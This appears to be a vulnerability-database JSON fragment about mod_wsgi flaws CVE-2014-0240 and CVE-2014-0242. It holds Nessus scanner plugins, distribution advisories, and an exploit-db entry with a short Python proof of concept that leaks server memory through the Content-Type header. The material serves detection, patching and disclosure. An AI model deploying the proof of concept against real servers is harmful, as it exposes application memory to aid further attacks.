value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|13\\.10|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 13.10 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libapache2-mod-wsgi\", pkgver:\"3.3-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libapache2-mod-wsgi-py3\", pkgver:\"3.3-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"libapache2-mod-wsgi\", pkgver:\"3.4-4ubuntu2.1.13.10.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"libapache2-mod-wsgi-py3\", pkgver:\"3.4-4ubuntu2.1.13.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-wsgi\", pkgver:\"3.4-4ubuntu2.1.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-wsgi-py3\", pkgver:\"3.4-4ubuntu2.1.14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-wsgi / libapache2-mod-wsgi-py3\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:02", "description": "From Red Hat Security Advisory 2014:0788 :\n\nAn updated mod_wsgi package that fixes two security issues is now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications\nwithin Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these\nissues. Upstream acknowledges Robert Kisteleki as the original\nreporter of CVE-2014-0240, and Buck Golemon as the original reporter\nof CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package,\nwhich contains backported patches to correct these issues.", "edition": 23, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-26T00:00:00", "title": "Oracle Linux 6 : mod_wsgi (ELSA-2014-0788)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-06-26T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mod_wsgi"], "id": "ORACLELINUX_ELSA-2014-0788.NASL", "href": "https://www.tenable.com/plugins/nessus/76231", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0788 and \n# Oracle Linux Security Advisory ELSA-2014-0788 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76231);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_bugtraq_id(67532, 67534);\n script_xref(name:\"RHSA\", value:\"2014:0788\");\n\n script_name(english:\"Oracle Linux 6 : mod_wsgi (ELSA-2014-0788)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0788 :\n\nAn updated mod_wsgi package that fixes two security issues is now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications\nwithin Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these\nissues. Upstream acknowledges Robert Kisteleki as the original\nreporter of CVE-2014-0240, and Buck Golemon as the original reporter\nof CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package,\nwhich contains backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004214.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_wsgi package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mod_wsgi-3.2-6.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:56:39", "description": "The remote host is affected by the vulnerability described in GLSA-201412-21\n(mod_wsgi: Privilege escalation)\n\n Two vulnerabilities have been found in mod_wsgi:\n Error codes returned by setuid are not properly handled\n (CVE-2014-0240)\n A memory leak exists via the “Content-Type” header\n (CVE-2014-0242)\n \nImpact :\n\n A local attacker may be able to gain escalated privileges. Furthermore,\n a remote attacker may be able to obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-12-15T00:00:00", "title": "GLSA-201412-21 : mod_wsgi: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-12-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mod_wsgi", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201412-21.NASL", "href": "https://www.tenable.com/plugins/nessus/79974", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-21.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79974);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_bugtraq_id(67532, 67534);\n script_xref(name:\"GLSA\", value:\"201412-21\");\n\n script_name(english:\"GLSA-201412-21 : mod_wsgi: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-21\n(mod_wsgi: Privilege escalation)\n\n Two vulnerabilities have been found in mod_wsgi:\n Error codes returned by setuid are not properly handled\n (CVE-2014-0240)\n A memory leak exists via the “Content-Type” header\n (CVE-2014-0242)\n \nImpact :\n\n A local attacker may be able to gain escalated privileges. Furthermore,\n a remote attacker may be able to obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All mod_wsgi users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apache/mod_wsgi-3.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apache/mod_wsgi\", unaffected:make_list(\"ge 3.5\"), vulnerable:make_list(\"lt 3.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The mod_wsgi adapter is an Apache module that provides a WSGI compliant interface for hosting Python based web applications within Apache. The adapter is written completely in C code against the Apache C runtime and for hosting WSGI applications within Apache has a lower overhead than using existing WSGI adapters for mod_python or CGI. ", "modified": "2014-06-17T23:26:05", "published": "2014-06-17T23:26:05", "id": "FEDORA:690482153A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mod_wsgi-3.5-1.fc20", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The mod_wsgi adapter is an Apache module that provides a WSGI compliant interface for hosting Python based web applications within Apache. The adapter is written completely in C code against the Apache C runtime and for hosting WSGI applications within Apache has a lower overhead than using existing WSGI adapters for mod_python or CGI. ", "modified": "2014-06-17T23:35:19", "published": "2014-06-17T23:35:19", "id": "FEDORA:63FF5215C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mod_wsgi-3.5-1.fc19", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T09:41:45", "description": "Apache 'mod_wsgi' Module Information Disclosure Vulnerability. CVE-2014-0242. Remote exploit for linux platform", "published": "2014-05-21T00:00:00", "type": "exploitdb", "title": "Apache 'mod_wsgi' Module Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0242"], "modified": "2014-05-21T00:00:00", "id": "EDB-ID:39196", "href": "https://www.exploit-db.com/exploits/39196/", "sourceData": "source: http://www.securityfocus.com/bid/67534/info\r\n\r\nmod_wsgi is prone to a remote information-disclosure vulnerability.\r\n\r\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. \r\n\r\nimport functools\r\n \r\nimport threading\r\nimport time\r\nimport random\r\n \r\ndef run(*args):\r\n while True:\r\n items = []\r\n for i in range(1000):\r\n items.append((int(random.random()*20)*'X'))\r\n time.sleep(0.00001)\r\n \r\nthread = threading.Thread(target=run)\r\nthread.start()\r\n \r\ndef headers():\r\n return [('Content-Type', 'text/plain'.upper().lower())]\r\n \r\ndef response():\r\n yield 'Hello World!\\n'\r\n \r\n_content_type_cache = {}\r\n \r\ndef intern_content_type(application):\r\n @functools.wraps(application)\r\n def _wrapper(environ, start_response):\r\n def _start_response(status, headers, *args):\r\n _headers = []\r\n for header, value in headers:\r\n if header.lower() == 'content-type':\r\n value = _content_type_cache.setdefault(value, value)\r\n _headers.append((header, value))\r\n return start_response(status, _headers, *args)\r\n return application(environ, _start_response)\r\n return _wrapper\r\n \r\n#@intern_content_type\r\ndef application(environ, start_response):\r\n status = '200 OK'\r\n \r\n start_response(status, headers())\r\n return response()\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39196/"}]}
